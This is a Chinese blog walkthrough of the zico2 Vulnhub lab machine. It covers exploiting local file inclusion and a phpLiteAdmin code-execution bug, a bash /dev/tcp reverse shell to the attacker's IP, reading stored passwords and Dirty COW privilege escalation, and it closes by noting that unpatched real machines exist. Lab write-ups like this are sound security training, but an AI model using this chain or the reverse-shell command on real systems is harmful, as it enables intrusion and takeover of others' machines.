当前位置:首页 » 《随便一记》 » 正文

Vulnhub靶场渗透-zico2_paidx,

24 人参与  2022年02月26日 09:10  分类 : 《随便一记》  评论

点击全文阅读


前言

靶机ip(192.168.110.128)
攻击机ip(192.168.110.127)
网络NAT模式

这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈

信息收集

在这里插入图片描述
打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上
在这里插入图片描述
继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录
在这里插入图片描述
很明显是数据库,手试了一波弱口令给我进去了,就是admin
在这里插入图片描述
在这里插入图片描述

漏洞挖掘

简单说一下
phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具
注意他的版本,这个版本是存在 php远程代码执行漏洞的
-----参考链接----
在这里插入图片描述
在这里插入图片描述
root:34kroot34
zico:zico2215@
尝试用 ssh 连接不行,会被检验

利用 phpliteadmin 写入一句话,正好可以利用最开始发现的文件包含来执行代码拿shell,就很舒服
数据库名我就叫 caidao.php
在这里插入图片描述
echo "bash -i >& /dev/tcp/192.168.110.127/2333 0>&1" | bash URL编码一下直接弹 shell
在这里插入图片描述
在这里插入图片描述
在 zico 用户下发现 WordPress,打开配置文件发现了一串密码
在这里插入图片描述
在这里插入图片描述
再次尝试 ssh 连接成功了
在这里插入图片描述
查看系统内核,尝试脏牛提权,具体怎么提权就不多说了,都是常规操作,可以看看我的这篇文章
-----------脏牛提权--------
在这里插入图片描述
这个时候 root 用户已经变成了我们这个
在这里插入图片描述
直接拿 flag
在这里插入图片描述

总结

又是老套路了,拿到shell然后脏牛提权拿 root,可见脏牛有多出名
在实战中也还是有很多老机器是运行着旧版本的linux且没有打补丁,所以懂的都懂,哈哈哈


点击全文阅读


本文链接:http://zhangshiyu.com/post/35377.html

尝试  简单  发现  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1